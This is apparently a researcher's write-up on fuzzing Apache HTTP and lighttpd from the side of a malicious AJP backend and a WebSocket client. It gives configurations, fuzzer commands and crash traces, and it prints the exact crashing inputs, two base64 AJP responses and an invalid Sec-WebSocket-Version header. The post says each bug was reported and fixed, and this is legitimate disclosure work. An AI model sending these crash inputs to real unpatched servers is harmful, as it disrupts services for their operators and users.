Taking a different approach to fuzzing HTTP servers


tl;dr: Took a non-standard approach to fuzz HTTP servers. Fuzzing from the perspective of a backend server (target HTTP behaving like a proxy) and web-socket client. In total, revealed 3 bugs in Apache HTTP and lighttpd.


I decided to again take a look at HTTP servers but this time taking a different, not typical approach. Instead of fuzzing a server from the perspective of an HTTP client, I wanted to play a bit and consider different potential scenarios.

Approach 1 - malicious backend

Fuzzing from the perspective of a backend. In that case, the target HTTP server was configured to become a reverse proxy, receive a fixed HTTP request, pass it to a backend, and then receive and process an HTTP response that was subject to manipulation by the fuzzer.


Except for typical reverse proxy configuration (mod_proxy), lighttpd supports also forwarding to AJP/1.3 backends (mod_ajp13). Both configurations were worth checking but AJP was more interesting because it’s less common than HTTP, thus could be less polished and contain more bugs.

Building a corpus of HTTP responses was pretty straightforward and is covered in many different places, so I’ll skip it. Preparing a corpus for AJP/1.3 part required more effort. This protocol is used mostly for forwarding traffic between a reverse proxy and an application backend so it’s not so often exposed publicly. It’s supported for example by Tomcat, WildFly, and Glassfish. To build the corpus I set up Tomcat and configured lighttpd to forward traffic to it. I used tcpdump to record all the network traffic issued various requests (authorized, not authorized, accessing existing and non-existing resources) through lighttpd but also directly interacting with Tomcat using nmap’s AJP-related scripts (ajp-auth,ajp-headers,ajp-methods,ajp-request). AJP responses extracted from the dump created the final corpus.

server.document-root = "/home/mmm/lighttpd/webroot"
server.port = 8001
server.modules += ("mod_ajp13")
    ajp13.server = ( "" =>
                     ( ( 
                       "host" => "",
                       "port" => 5577
                     ) )

Writing a harness was more tricky as I had to implement a socket-based server and client directly in the lighttpd code. Full code is available here and is quite long, so I’ll give a high-level overview of it:

  1. Create a listening socket on port 5577 (this one simulates the AJP backend)
  2. Create a socket, connect to lighttpd (port 8001), and send a fixed HTTP request (this one simulates HTTP client)
  3. Receive an AJP request and respond with a mutated AJP response.

Finally, I was ready to build and start fuzzing.

sudo scons -j 4 build_static=1 build_dynamic=0 install
export FUZZINPUTFILE=/home/mmm/lighttpd/input
afl-fuzz -G 10240 -i ~/lighttpd/corpus/ -o ~/lighttpd/fuzz/output -f /home/mmm/lighttpd/input  -- /usr/local/sbin/lighttpd -D -f /home/mmm/lighttpd/my.conf

The fuzzing revealed one case where a malformed AJP response (QUIAAASA/wAA in base64) was triggering read heap buffer overflow and as a result, was crashing the server.

==1859941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004901 at pc 0x000000434647 bp 0x7fffffffda60 sp 0x7fffffffd220
READ of size 16706 at 0x625000004901 thread T0
Program received signal SIGSEGV, Segmentation fault.
ajp13_expand_headers (hctx=0x5555555f14e0, plen=4294869346, b=0x5555555e66d0) at src/mod_ajp13.c:740
740                len = ajp13_dec_uint16(ptr);
(gdb) print ptr
$1 = (uint8_t *) 0x555555607000 <error: Cannot access memory at address 0x555555607000>

I reported the issue and it was fixed in lighttpd 1.4.67:

Apache HTTP

I took the same approach for Apache. The general idea and corpus remained the same, only the configuration file and the harness here required adaptation.

<VirtualHost *:80>
    ProxyRequests Off
    ProxyPass / ajp://localhost:8012/
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

This time also one crash was found. A null pointer dereference condition was happening when the server received a malformed AJP response (QUIAEAQAEABlZS1wYzktMQAgCgBBQgACBQFR in base64). The r->headers_out pointer in the ap_content_length_filter function (protocol.c) was null while being passed to the apr_table_setn function. As the result, a process or a thread was crashing (depending on the configuration).

Thread 3 "httpd" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff728a700 (LWP 289134)]
0x00007ffff7ecfe2b in apr_table_setn () from /lib/x86_64-linux-gnu/libapr-1.so.0
(gdb) up
#1  0x00005555555a0758 in ap_set_content_length (r=0x7ffff424d0a0, clength=0) at protocol.c:163
163     apr_table_setn(r->headers_out, "Content-Length",
(gdb) print r->headers_out
$1 = (apr_table_t *) 0x0

I reported it to the Apache Security Team. It wasn’t qualified as a security vulnerability but as a hardening issue and was eventually fixed.

Approach 2 - malicious web socket

Fuzzing from the perspective of a web socket client. The target HTTP server was configured to receive and pass web socket data.

This approach was easier to implement because the harness just needed to send a packet over a socket (available here). Also, I decided to skip Apache and focus only on lighttpd and its mod_wstunnel.

Configuration was based on an example backend script from the documentation.

server.document-root = "/home/m/webroot"
server.port = 3000
mimetype.assign = (
  ".html" => "text/html",

server.modules += ("mod_wstunnel")
wstunnel.server = (
  "/ws/" => (
      "socket" => "/dev/shm/psock",
      "bin-path" => "/home/m/echo.pl",
      "max-procs" => 1

A corpus consisted mostly of HTTP requests responsible for a web socket handshake.

Even such a limited corpus and coverage led to the discovery of one more bug. When the server received a handshake with an invalid value in the Sec-WebSocket-Version header (for example Sec-WebSocket-Version: x), it was triggering a null pointer dereference resulting in a crash.

$ gdb --args lighttpd -D -f server.conf 
(gdb) r
Starting program: /usr/local/sbin/lighttpd -D -f server.conf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
2022-08-02 16:41:47: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) up
#1  0x000055555559d75e in gw_write_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw_backend.c:1993
1993                handler_t rc = hctx->create_env(hctx);
(gdb) print hctx->create_env
$1 = (handler_t (*)(struct gw_handler_ctx *)) 0x0

This crash was also reported and fixed:


Changing the approach to fuzzing and exploring different scenarios proved to be a successful way to uncover more trivial bugs in popular software. Even if the findings were not critical, they still could disrupt the work of servers running it.